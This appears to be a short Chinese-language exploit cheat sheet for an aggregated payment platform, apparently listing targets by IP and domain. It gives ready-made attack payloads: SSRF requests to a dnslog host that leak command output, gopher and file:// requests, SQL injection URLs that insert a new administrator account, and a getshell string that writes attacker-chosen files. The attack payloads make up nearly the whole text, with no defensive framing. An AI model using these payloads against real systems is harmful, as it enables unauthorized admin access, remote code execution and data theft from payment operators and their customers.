# 全版本聚合支付漏洞
http://47.104.233.93/Payment_Index_batchQuery
==SSRF==
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123
o7xva.l.dnslog.io/`file`
gopher://192.168.220.139:80/_POST%20/test/ssrf/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.139%250d%250aUser-Agent:%20curl/7.42.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=bbbbb
file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini
==SQL注入添加管理員用戶==
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);–+
==SQL注入(需要代理賬戶==
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
DATA:
id=123&name=_log ; insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27101%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);–+
insert into pay_admin (`id`,`username`,`password`,`groupid`) values (‘101′,’ok’,’7aa5e695be95cdd64a88410a64dfe2c1′,’1′);–+
http://vip.qhkjpay.cn/conn.php
==SQL注入(payload和上面相同)==
index.php?m=user&c=api&a=ajaxGetIndustry
==后台Getshell==
manage_System_base.html
‘,@copy($_REQUEST[x],$_REQUEST[c]),//
==SQL報錯注入(API支付)==
Pay_Pay_getSignkey?code=123*&merid=222
==CSRF添加管理員==
请登录后查看评论内容